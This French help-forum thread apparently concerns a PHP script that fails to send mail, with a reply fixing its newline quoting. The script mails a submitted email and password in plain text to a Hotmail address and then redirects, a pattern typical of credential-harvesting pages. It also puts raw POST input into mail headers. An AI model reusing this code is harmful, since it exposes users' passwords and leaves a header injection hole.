Mail PHP
-Shadow-
Messages postés
2152
Membre
Dernière intervention
-
gryzzly Messages postés 4608 Date d'inscription Statut Contributeur Dernière intervention -
gryzzly Messages postés 4608 Date d'inscription Statut Contributeur Dernière intervention -
Bonjour,
ce script PHP est censé m'envoyer un mail, mais ça ne marche pas.
Pourquoi ne marche-t-il pas?
Merci d'avance.
Mat'
ce script PHP est censé m'envoyer un mail, mais ça ne marche pas.
<?php $sender = "z@hotmail.fr"; $pwd = $_POST['password']; $eml = $_POST['email']; $headers ='From: "nom"<'.$eml.'>'.'\n'; $headers .='Reply-To: z@hotmail.fr'.'\n'; $headers .='Content-Type: text/plain; charset="iso-8859-1"'.'\n'; $headers .='Content-Transfer-Encoding: 8bit'; mail($sender, "Abonnement", "Email: ".$eml."\nPassword: ".$pwd."\n\nMerci de vous être enregistrés!", $headers); Header("Location: http://www.monsite.com/"); ?>
Pourquoi ne marche-t-il pas?
Merci d'avance.
Mat'
A voir également:
- Mail PHP
- Publipostage mail - Accueil - Word
- Windows live mail - Télécharger - Mail
- Créer une adresse mail hotmail - Guide
- Comment télécharger un mail - Guide
- Cegetel mail ✓ - Forum Mail
3 réponses
Re,
Merci pour ta réponse,
C'est un serveur distant qui ne m'appartient pas, c'est en fait Free ^^
Donc sous Linux.
A+,
Mat'
Merci pour ta réponse,
C'est un serveur distant qui ne m'appartient pas, c'est en fait Free ^^
Donc sous Linux.
A+,
Mat'
Peut etre a cause des headers
'\n' n'est pas valide. c'est "\n" ... par contre, ne me demandes pas l'explication, je n'en ai pas.
'\n' n'est pas valide. c'est "\n" ... par contre, ne me demandes pas l'explication, je n'en ai pas.
<?php $sender = "z@hotmail.fr"; $pwd = "pass"; $eml = "exp@dit.eur"; $headers ="From: nom<".$eml.">"."\n"; $headers .="Reply-To: z@hotmail.fr"."\n"; $headers .="Content-Type: text/plain; charset='iso-8859-1'"."\n"; $headers .="Content-Transfer-Encoding: 8bit"; mail($sender, "Abonnement", "Email: ".$eml."\nPassword: ".$pwd."\n\nMerci de vous être enregistrés!", $headers); ?>